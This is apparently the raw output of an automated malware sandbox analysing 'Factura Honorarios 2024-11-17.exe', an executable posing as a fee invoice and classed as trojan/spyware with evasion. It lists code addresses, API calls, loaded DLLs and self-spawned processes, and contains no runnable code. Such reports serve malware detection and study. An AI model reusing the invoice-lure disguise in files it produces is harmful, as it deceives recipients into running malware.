          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_391E79983_2_391E7998
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_391EE7903_2_391EE790
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_391E1B913_2_391E1B91
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_391EA48F3_2_391EA48F
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_391E24883_2_391E2488
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_391EBC883_2_391EBC88
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_391E79883_2_391E7988
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_391E4D893_2_391E4D89
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_391E12803_2_391E1280
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_391E91803_2_391E9180
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_391E74BF3_2_391E74BF
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_391E56B83_2_391E56B8
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_391E8CB83_2_391E8CB8
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_391E36B83_2_391E36B8
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_391EE2B83_2_391EE2B8
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_391EFAB03_2_391EFAB0
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_391EB7AF3_2_391EB7AF
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_391E2DA83_2_391E2DA8
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_391ECFA83_2_391ECFA8
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_391E56A83_2_391E56A8
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_391E8CA93_2_391E8CA9
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_391ECFA63_2_391ECFA6
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_391EA4A03_2_391EA4A0
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_391EFAA03_2_391EFAA0
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_391E9FD83_2_391E9FD8
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_391E3FD83_2_391E3FD8
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_391EF5D73_2_391EF5D7
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_391E04D03_2_391E04D0
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_391E74D03_2_391E74D0
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_391ECAD13_2_391ECAD1
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_391E9FCC3_2_391E9FCC
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_391E36C83_2_391E36C8
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_391EE2C83_2_391EE2C8
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_391E5FC73_2_391E5FC7
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_391EB7C03_2_391EB7C0
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_391E04C03_2_391E04C0
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_391E16FF3_2_391E16FF
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_391E9AFF3_2_391E9AFF
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_391E6FFA3_2_391E6FFA
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_391E1FF83_2_391E1FF8
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_391EB2F83_2_391EB2F8
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_391E48F73_2_391E48F7
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_391E0DF03_2_391E0DF0
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_391E87F03_2_391E87F0
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_391EDDF03_2_391EDDF0
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_391E3FE83_2_391E3FE8
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_391EF5E83_2_391EF5E8
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_391E1FE83_2_391E1FE8
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_391EB2E83_2_391EB2E8
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_391E0DE03_2_391E0DE0
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_391E87E03_2_391E87E0
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_3920D7103_2_3920D710
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_392070C03_2_392070C0
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_392061203_2_39206120
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_39202F203_2_39202F20
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_392045003_2_39204500
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_392013003_2_39201300
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_392067603_2_39206760
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_392035603_2_39203560
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_392003603_2_39200360
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_3920ED7A3_2_3920ED7A
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_39204B403_2_39204B40
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_392019403_2_39201940
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_392067503_2_39206750
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_39206DA03_2_39206DA0
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_39203BA03_2_39203BA0
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_392009A03_2_392009A0
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_392051803_2_39205180
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_39201F803_2_39201F80
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_392041E03_2_392041E0
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_39200FE03_2_39200FE0
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_392057C03_2_392057C0
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_392025C03_2_392025C0
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_392048203_2_39204820
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_392016203_2_39201620
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_39205E003_2_39205E00
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_39202C003_2_39202C00
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_39204E603_2_39204E60
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_39201C603_2_39201C60
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_39206A703_2_39206A70
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_392064403_2_39206440
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_392032403_2_39203240
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_392000403_2_39200040
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_3920EE483_2_3920EE48
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_392054A03_2_392054A0
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_392022A03_2_392022A0
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_392038803_2_39203880
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_392006803_2_39200680
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_39206A803_2_39206A80
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_39205AE03_2_39205AE0
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_392028E03_2_392028E0
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_39203EC03_2_39203EC0
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_39200CC03_2_39200CC0
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_3921FB303_2_3921FB30
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_392187903_2_39218790
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_392184703_2_39218470
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_39211CF03_2_39211CF0
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_3921C9303_2_3921C930
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_392197303_2_39219730
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_392105083_2_39210508
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_3921AD103_2_3921AD10
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_3921DF103_2_3921DF10
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_392113603_2_39211360
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_39219D703_2_39219D70
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_3921CF703_2_3921CF70
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_392113513_2_39211351
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_3921E5503_2_3921E550
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_3921B3503_2_3921B350
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_3921D5B03_2_3921D5B0
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_3921A3B03_2_3921A3B0
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_392109BF3_2_392109BF
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_3921B9903_2_3921B990
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_3921EB903_2_3921EB90
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_3921DBF03_2_3921DBF0
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_3921A9F03_2_3921A9F0
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_3921F1D03_2_3921F1D0
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_392109D03_2_392109D0
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_39218DD03_2_39218DD0
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_3921BFD03_2_3921BFD0
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_392118283_2_39211828
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_3921B0303_2_3921B030
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_3921E2303_2_3921E230
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_3921C6103_2_3921C610
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_392194103_2_39219410
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_3921F8103_2_3921F810
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_392100123_2_39210012
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_392118173_2_39211817
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_3921E8703_2_3921E870
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_3921B6703_2_3921B670
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_392100403_2_39210040
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_39219A503_2_39219A50
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_3921CC503_2_3921CC50
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_3921BCB03_2_3921BCB0
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_39218AB03_2_39218AB0
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_3921EEB03_2_3921EEB0
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_39210E8A3_2_39210E8A
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_3921A0903_2_3921A090
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_3921D2903_2_3921D290
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_39210E983_2_39210E98
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_39211CE03_2_39211CE0
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_3921F4F03_2_3921F4F0
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_392190F03_2_392190F0
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_3921C2F03_2_3921C2F0
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_392104FA3_2_392104FA
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_3921D8D03_2_3921D8D0
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_3921A6D03_2_3921A6D0
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_39391B503_2_39391B50
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_393930083_2_39393008
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_393914703_2_39391470
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_393936F03_2_393936F0
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_393929203_2_39392920
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_39390D883_2_39390D88
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_393922383_2_39392238
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_39391B3F3_2_39391B3F
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_393914603_2_39391460
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_393936E13_2_393936E1
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_393929113_2_39392911
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_393909E13_2_393909E1
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_39390A103_2_39390A10
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_39390D7A3_2_39390D7A
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_39392FFA3_2_39392FFA
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_393900273_2_39390027
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_393900403_2_39390040
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_393922293_2_39392229
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_394838D03_2_394838D0
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_394891303_2_39489130
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_39481A203_2_39481A20
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_394826383_2_39482638
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe; Code function: String function: 00402C41 appears 51 times
          Source: Factura Honorarios 2024-11-17.exe, 00000000.00000000.1405150029.000000000044D000.00000002.00000001.01000000.00000003.sdmp; Binary or memory string: OriginalFilenamepillowber swing.exeDVarFileInfo$ vs Factura Honorarios 2024-11-17.exe
          Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2663301435.0000000005999000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: OriginalFilenameclr.dllT vs Factura Honorarios 2024-11-17.exe
          Source: Factura Honorarios 2024-11-17.exe, 00000003.00000000.1869133233.000000000044D000.00000002.00000001.01000000.00000003.sdmp; Binary or memory string: OriginalFilenamepillowber swing.exeDVarFileInfo$ vs Factura Honorarios 2024-11-17.exe
          Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2683754964.0000000035CC7000.00000004.00000010.00020000.00000000.sdmp; Binary or memory string: OriginalFilenameUNKNOWN_FILET vs Factura Honorarios 2024-11-17.exe
          Source: Factura Honorarios 2024-11-17.exe; Binary or memory string: OriginalFilenamepillowber swing.exeDVarFileInfo$ vs Factura Honorarios 2024-11-17.exe
          Source: Factura Honorarios 2024-11-17.exe; Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
          Source: classification engine; Classification label: mal100.troj.spyw.evad.winEXE@3/6@5/5
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe; Code function: 0_2_00403359 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe; Code function: 3_2_00403359 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe; Code function: 0_2_004046EC GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe; Code function: 0_2_00402104 CoCreateInstance
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe; Mutant created: NULL
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe; File created: C:\Users\user\AppData\Local\Temp\nsk8B7C.tmp
          Source: Factura Honorarios 2024-11-17.exe; Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe; File read: C:\Users\desktop.ini
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe; Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: Factura Honorarios 2024-11-17.exe; ReversingLabs: Detection: 31%
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe; File read: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe
          Source: unknown; Process created: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe "C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe"
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe; Process created: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe "C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe"
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe; Process created: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe "C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe"
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe; Section loaded: uxtheme.dll
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe; Section loaded: userenv.dll
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe; Section loaded: apphelp.dll
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe; Section loaded: propsys.dll
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe; Section loaded: dwmapi.dll
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe; Section loaded: cryptbase.dll
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe; Section loaded: oleacc.dll
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe; Section loaded: version.dll
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe; Section loaded: shfolder.dll
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe; Section loaded: kernel.appcore.dll
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe; Section loaded: windows.storage.dll
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe; Section loaded: wldp.dll
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe; Section loaded: riched20.dll
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe; Section loaded: usp10.dll
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe; Section loaded: msls31.dll
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe; Section loaded: textinputframework.dll
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe; Section loaded: coreuicomponents.dll
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe; Section loaded: coremessaging.dll
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe; Section loaded: ntmarta.dll
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe; Section loaded: coremessaging.dll
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeSection loaded: textshaping.dllJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeSection loaded: schannel.dllJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeSection loaded: mskeyprotect.dllJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeSection loaded: ntasn1.dllJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeSection loaded: dpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeSection loaded: ncryptsslp.dllJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
